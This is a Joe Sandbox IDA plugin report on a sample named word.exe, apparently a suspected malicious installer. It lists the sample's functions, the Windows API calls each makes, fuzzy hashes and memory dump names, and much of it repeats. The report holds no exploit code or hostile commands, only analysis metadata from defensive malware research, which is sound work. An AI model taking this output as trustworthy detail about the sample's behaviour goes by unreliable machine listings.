Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\word.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3317864059
Opcode ID: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
Instruction ID: 7b30a10291eb0396c8f4e95b118cc70be9f64314849ede57e52aca42a9cf7d7a
Opcode Fuzzy Hash: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
Instruction Fuzzy Hash: 9E11C451808B962AEB3216344C44F77BF99CF56760F18007BE9C4B22C2D67C5C429B6D

Function 00404053 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404070
GetSysColor.USER32(00000000), ref: 0040408C
SetTextColor.GDI32(?,00000000), ref: 00404098
SetBkMode.GDI32(?,?), ref: 004040A4
GetSysColor.USER32(?), ref: 004040B7
SetBkColor.GDI32(?,?), ref: 004040C7
DeleteObject.GDI32(?), ref: 004040E1
CreateBrushIndirect.GDI32(?), ref: 004040EB

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65

Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 1000234A

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234

GlobalAlloc.KERNEL32(?,?), ref: 100022C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
GlobalAlloc.KERNEL32(?,?), ref: 100022E7
CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
GlobalFree.KERNEL32(00000000), ref: 100022FB

Memory Dump Source

Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_word.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
Instruction ID: fe65b043c70383bd2b49c92c90746d4950a0c6047a38c1932a2dc3020861886a
Opcode Fuzzy Hash: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
Instruction Fuzzy Hash: F6418BB1108711EFF720DFA48884B5BB7F8FF443D1F218929F946D61A9DB34AA448B61

Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalFree.KERNEL32(?), ref: 100024B9
GlobalFree.KERNEL32(00000000), ref: 100024F3

Memory Dump Source

Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_word.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
Instruction ID: 82133e1bc6da927614d5bcfc3b496831b4cb396c3e6da136b8b2dca3161aa200
Opcode Fuzzy Hash: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
Instruction Fuzzy Hash: 75319CB1504251EFF722CF94CCC4C6B7BBDEB852D4B128569FA4193228DB31AC54DB62

Function 004026B3 Relevance: 10.6, APIs: 7, Instructions: 75memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

GlobalAlloc.KERNEL32(?,?), ref: 004026D7
CloseHandle.KERNEL32(?), ref: 0040275D

Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004026F3
GlobalFree.KERNEL32(?), ref: 0040272C
WriteFile.KERNEL32(?,00000000,?,?), ref: 0040273E
GlobalFree.KERNEL32(00000000), ref: 00402745

Part of subcall function 00402F1F: SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
Part of subcall function 00402F1F: WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,?,00000004,00000000,00000000,?,?), ref: 00402FD2

DeleteFileA.KERNEL32(?), ref: 00402771

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
String ID:
API String ID: 64603807-0
Opcode ID: f5572cba1f41e56528db20e94bb2b414aea4885ca7313004b5803c0666e82ddc
Instruction ID: 39d681308be84b49fc043c668352bfd213fb34ea520f048123e5f65a43450375
Opcode Fuzzy Hash: f5572cba1f41e56528db20e94bb2b414aea4885ca7313004b5803c0666e82ddc
Instruction Fuzzy Hash: 77218C71C00118BFCF116FA4CD88CAEBE79EF08364B10423AF520772E0C6795D419BA8

Function 00404FDC Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
Instruction ID: 23c8d3588392bc678d7246373841442171ea5a50e124834ae8740ae97285bd87
Opcode Fuzzy Hash: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
Instruction Fuzzy Hash: FD218C71900508BADB119FA5DD84ADFBFA9EF14354F14807AF504B6290C2799A41CFA8

Function 00402BDA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
GetTickCount.KERNEL32 ref: 00402C10
wsprintfA.USER32 ref: 00402C3E

Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
ShowWindow.USER32(00000000,00000005), ref: 00402C70

Part of subcall function 00402BBE: MulDiv.KERNEL32(00000000,?,0005B071), ref: 00402BD3

Strings

... %d%%, xrefs: 00402C38

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: dd16a8e3e29a7078c9400af3a90b17e12947c4b40babff7d6952d3a04bc15912
Instruction ID: 37d10fed78b44bbf962512fa666ce1a12177f0d23356d60e90fa74daf698f4f0
Opcode Fuzzy Hash: dd16a8e3e29a7078c9400af3a90b17e12947c4b40babff7d6952d3a04bc15912
Instruction Fuzzy Hash: 900165B0949614ABDB216F64AE4DE9F7B78BB01701714C037FA01B11E1C6B8D541CB9E

Function 004048A7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
GetMessagePos.USER32 ref: 004048CA
ScreenToClient.USER32(?,?), ref: 004048E4
SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C

Strings

f, xrefs: 004048F8

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: add3c7f7873227bd74a4bce1351eac807b502806bceb4e0d6bae9f806a4b5eb6
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 61014C75D00218BAEB11DBA4DC85BFFBBBCAB55711F10412BBA10B62C0C7B4A9018BA5

Function 00402B42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3

Strings

unpacking data: %d%%, xrefs: 00402B7F
verifying installer: %d%%, xrefs: 00402B86, 00402B8F

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
Instruction ID: 1ce9201bfa48cab7b8fa553f1801af8382b39519b903b04a6adfa3bfa778fb21
Opcode Fuzzy Hash: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
Instruction Fuzzy Hash: 0DF01D70900208ABEF215F61CD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 8c1d5d282e63fa750a7411733debfdae667bc57b8f94cb70390eb4c580c11dbe
Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
Opcode Fuzzy Hash: 8c1d5d282e63fa750a7411733debfdae667bc57b8f94cb70390eb4c580c11dbe
Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79

Function 004047C5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041FCF8,0041FCF8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004046E5,000000DF,0000040F,00000400,00000000), ref: 00404853
wsprintfA.USER32 ref: 0040485B
SetDlgItemTextA.USER32(?,0041FCF8), ref: 0040486E

Strings

%u.%u%s%s, xrefs: 0040483D

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
Instruction ID: 1dbe8f306e20f990bcdfb4b2d97c48a080c9d40feb998d0653c6b80998781608
Opcode Fuzzy Hash: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
Instruction Fuzzy Hash: CE11347360012437CB1062699C49EEF3249CBC2334F24823BFA25F71D1E9788C5282E8

Function 00403A4C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4

Strings

"C:\Users\user\Desktop\word.exe", xrefs: 00403A4D
+/R, xrefs: 00403AC1
1033, xrefs: 00403A50, 00403A5A, 00403ACB

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\word.exe"$+/R$1033
API String ID: 530164218-4287074229
Opcode ID: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
Instruction ID: afbb14256cc631d10caee281dea517f3a5a89f89e2cd0ba730366887019fa8a8
Opcode Fuzzy Hash: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
Instruction Fuzzy Hash: A411C2B1B04610ABC724DF15DC8092377BDEB84716328813BA84167391C63D9E029A98

Function 00405781 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405787
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405790
lstrcatA.KERNEL32(?,00409014), ref: 004057A1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405781

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction ID: 5d0f413141f52f4d8e8af186490daeb449751c8a1e5703fa5fe58453a807c488
Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction Fuzzy Hash: A4D0C9A2A059306AD3122655AC09F9B6A48CF56755B099077F200B62A2C67C5D418FFE

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
Instruction ID: daf777410944a799184fcc454f008e4928398c379a2567b3caca2a2cde185cee
Opcode Fuzzy Hash: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
Instruction Fuzzy Hash: 1B115EB1900208BEDB01EFA5D941DAEBBB9EF04344B20807AF505F61A1D7389E54EB28

Function 0040581A Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\,?,00405886,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405828
CharNextA.USER32(00000000), ref: 0040582D
CharNextA.USER32(00000000), ref: 00405841

Strings

C:\, xrefs: 0040581B

Memory Dump Source

